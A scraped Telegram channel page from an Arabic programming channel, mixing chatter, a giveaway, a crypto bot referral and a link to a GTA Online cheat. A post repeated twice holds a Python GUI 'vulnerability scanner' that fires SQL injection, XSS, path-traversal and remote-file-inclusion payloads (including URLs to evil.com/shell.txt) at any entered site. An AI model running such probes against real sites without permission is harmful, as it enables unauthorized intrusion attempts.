cookie

نحن نستخدم ملفات تعريف الارتباط لتحسين تجربة التصفح الخاصة بك. بالنقر على "قبول الكل"، أنت توافق على استخدام ملفات تعريف الارتباط.

avatar

شروحات فرقة MAX

قناه متخصصه في البرمجه والملفات . dart , Python , html , css ,JavaScript, flutter للفائده فقط . #مطورين —— ————

إظهار المزيد
مشاركات الإعلانات
2 994
المشتركون
-124 ساعات
-107 أيام
لا توجد بيانات30 أيام

جاري تحميل البيانات...

معدل نمو المشترك

جاري تحميل البيانات...

Repost from WeWantYou
gift
X 15000
جوائز السحب15000 اشتراك Telegram Premium لمدة 12 شهر
جميع مشتركي القناة:
WeWantYou
4.76m
~2.68m
56.17%
تاريخ الانتهاء
Photo unavailableShow in Telegram
رجع الحدث بس يريد مستوى ذهبي او بلاتيني
إظهار الكل...
Photo unavailableShow in Telegram
import tkinter as tk
from tkinter import messagebox
import requests

# Vulnerability Payloads
sql_payloads = ["' OR '1'='1'; -- ", "' OR '1'='1'#", "' OR '1'='1'/*"]
xss_payloads = ["<script>alert('XSS')</script>", "\" onmouseover=\"alert(1)\""]
lfi_payloads = ["../../etc/passwd", "../../../boot.ini", "../../../../../etc/hosts"]
rfi_payloads = ["http://evil.com/shell.txt", "http://malicious.com/malware.php"]

def check_sql_injection(url):
    vulnerable = False
    for payload in sql_payloads:
        full_url = f"{url}{payload}"
        try:
            response = requests.get(full_url)
            if "SQL" in response.text or "syntax" in response.text:
                vulnerable = True
                break
        except requests.exceptions.RequestException as e:
            messagebox.showerror("Error", str(e))
    return vulnerable

def check_xss(url):
    vulnerable = False
    for payload in xss_payloads:
        full_url = f"{url}{payload}"
        try:
            response = requests.get(full_url)
            if payload in response.text:
                vulnerable = True
                break
        except requests.exceptions.RequestException as e:
            messagebox.showerror("Error", str(e))
    return vulnerable

def check_lfi(url):
    vulnerable = False
    for payload in lfi_payloads:
        full_url = f"{url}{payload}"
        try:
            response = requests.get(full_url)
            if "root:x:" in response.text or "boot.ini" in response.text:
                vulnerable = True
                break
        except requests.exceptions.RequestException as e:
            messagebox.showerror("Error", str(e))
    return vulnerable

def check_rfi(url):
    vulnerable = False
    for payload in rfi_payloads:
        full_url = f"{url}?url={payload}"
        try:
            response = requests.get(full_url)
            if "malware" in response.text or "shell" in response.text:
                vulnerable = True
                break
        except requests.exceptions.RequestException as e:
            messagebox.showerror("Error", str(e))
    return vulnerable

def run_checks():
    url = entry_url.get()
    if not url:
        messagebox.showwarning("Input Error", "Please enter a URL")
        return

    sql_vulnerable = check_sql_injection(url)
    xss_vulnerable = check_xss(url)
    lfi_vulnerable = check_lfi(url)
    rfi_vulnerable = check_rfi(url)

    result = f"Results for {url}:\n\n"
    result += f"SQL Injection: {'Vulnerable' if sql_vulnerable else 'Safe'}\n"
    result += f"XSS: {'Vulnerable' if xss_vulnerable else 'Safe'}\n"
    result += f"LFI: {'Vulnerable' if lfi_vulnerable else 'Safe'}\n"
    result += f"RFI: {'Vulnerable' if rfi_vulnerable else 'Safe'}\n"
    
    messagebox.showinfo("Scan Results", result)

# GUI setup
root = tk.Tk()
root.title("Vulnerability Scanner")

frame = tk.Frame(root, padx=20, pady=20)
frame.pack(padx=10, pady=10)

label_url = tk.Label(frame, text="Enter URL:")
label_url.grid(row=0, column=0)

entry_url = tk.Entry(frame, width=50)
entry_url.grid(row=0, column=1)

button_scan = tk.Button(frame, text="Scan for Vulnerabilities", command=run_checks)
button_scan.grid(row=1, columnspan=2, pady=10)

root.mainloop()

 
سويت تطبيق اكتشاف ثغرات مواقع يفيدكم مثل xss وsql و lfi و rfi
إظهار الكل...
👍 3🤯 1
import tkinter as tk
from tkinter import messagebox
import requests

# Vulnerability Payloads
sql_payloads = ["' OR '1'='1'; -- ", "' OR '1'='1'#", "' OR '1'='1'/*"]
xss_payloads = ["<script>alert('XSS')</script>", "\" onmouseover=\"alert(1)\""]
lfi_payloads = ["../../etc/passwd", "../../../boot.ini", "../../../../../etc/hosts"]
rfi_payloads = ["http://evil.com/shell.txt", "http://malicious.com/malware.php"]

def check_sql_injection(url):
    vulnerable = False
    for payload in sql_payloads:
        full_url = f"{url}{payload}"
        try:
            response = requests.get(full_url)
            if "SQL" in response.text or "syntax" in response.text:
                vulnerable = True
                break
        except requests.exceptions.RequestException as e:
            messagebox.showerror("Error", str(e))
    return vulnerable

def check_xss(url):
    vulnerable = False
    for payload in xss_payloads:
        full_url = f"{url}{payload}"
        try:
            response = requests.get(full_url)
            if payload in response.text:
                vulnerable = True
                break
        except requests.exceptions.RequestException as e:
            messagebox.showerror("Error", str(e))
    return vulnerable

def check_lfi(url):
    vulnerable = False
    for payload in lfi_payloads:
        full_url = f"{url}{payload}"
        try:
            response = requests.get(full_url)
            if "root:x:" in response.text or "boot.ini" in response.text:
                vulnerable = True
                break
        except requests.exceptions.RequestException as e:
            messagebox.showerror("Error", str(e))
    return vulnerable

def check_rfi(url):
    vulnerable = False
    for payload in rfi_payloads:
        full_url = f"{url}?url={payload}"
        try:
            response = requests.get(full_url)
            if "malware" in response.text or "shell" in response.text:
                vulnerable = True
                break
        except requests.exceptions.RequestException as e:
            messagebox.showerror("Error", str(e))
    return vulnerable

def run_checks():
    url = entry_url.get()
    if not url:
        messagebox.showwarning("Input Error", "Please enter a URL")
        return

    sql_vulnerable = check_sql_injection(url)
    xss_vulnerable = check_xss(url)
    lfi_vulnerable = check_lfi(url)
    rfi_vulnerable = check_rfi(url)

    result = f"Results for {url}:\n\n"
    result += f"SQL Injection: {'Vulnerable' if sql_vulnerable else 'Safe'}\n"
    result += f"XSS: {'Vulnerable' if xss_vulnerable else 'Safe'}\n"
    result += f"LFI: {'Vulnerable' if lfi_vulnerable else 'Safe'}\n"
    result += f"RFI: {'Vulnerable' if rfi_vulnerable else 'Safe'}\n"
    
    messagebox.showinfo("Scan Results", result)

# GUI setup
root = tk.Tk()
root.title("Vulnerability Scanner")

frame = tk.Frame(root, padx=20, pady=20)
frame.pack(padx=10, pady=10)

label_url = tk.Label(frame, text="Enter URL:")
label_url.grid(row=0, column=0)

entry_url = tk.Entry(frame, width=50)
entry_url.grid(row=0, column=1)

button_scan = tk.Button(frame, text="Scan for Vulnerabilities", command=run_checks)
button_scan.grid(row=1, columnspan=2, pady=10)

root.mainloop()

 تطبيق اكتسشاف ثغرات يفيدكم
سويت ت
إظهار الكل...
بوت النجوم https://t.me/major/start?startapp=1164902136 اول متدخله ينطيك 100نجمة
إظهار الكل...
Major

Welcome to @Major bot. Boost your rating by stars and completing tasks. Convert rating to $MAJOR token soon.

👍 2🤔 1
شتكولون ،
إظهار الكل...
🔥 4🤯 1
اريد سوي تطبيق اندرويد الابلاغ عن المبتزين وبيه فحص ايبيات ومنافذ مفتوحة ايضا وبعض امور حضيف
إظهار الكل...
🔥 4
اخوان عذروني مكاعد نزل شي هل فترة بس تعرفون ضروف تحكم والي كاعد يغادر براحته اليحب يبقة ويشرفني ويضل ويانا بل قناة بل حلوة والمرة بكيفه
إظهار الكل...
8👍 3
Photo unavailableShow in Telegram
https://t.me/X888E نظمو هنا نشر بينات
إظهار الكل...
👍 2
لمحبين هاك gta هاك حلو وامن بس تبع تعليمات دعم https://discord.gg/cxrqtg9Z هاك يشتغل عل اونلاين
إظهار الكل...
Join the ROOX Discord Server!

Check out the ROOX community on Discord - hang out with 6771 other members and enjoy free voice and text chat.

اختر خطة مختلفة

تسمح خطتك الحالية بتحليلات لما لا يزيد عن 5 قنوات. للحصول على المزيد، يُرجى اختيار خطة مختلفة.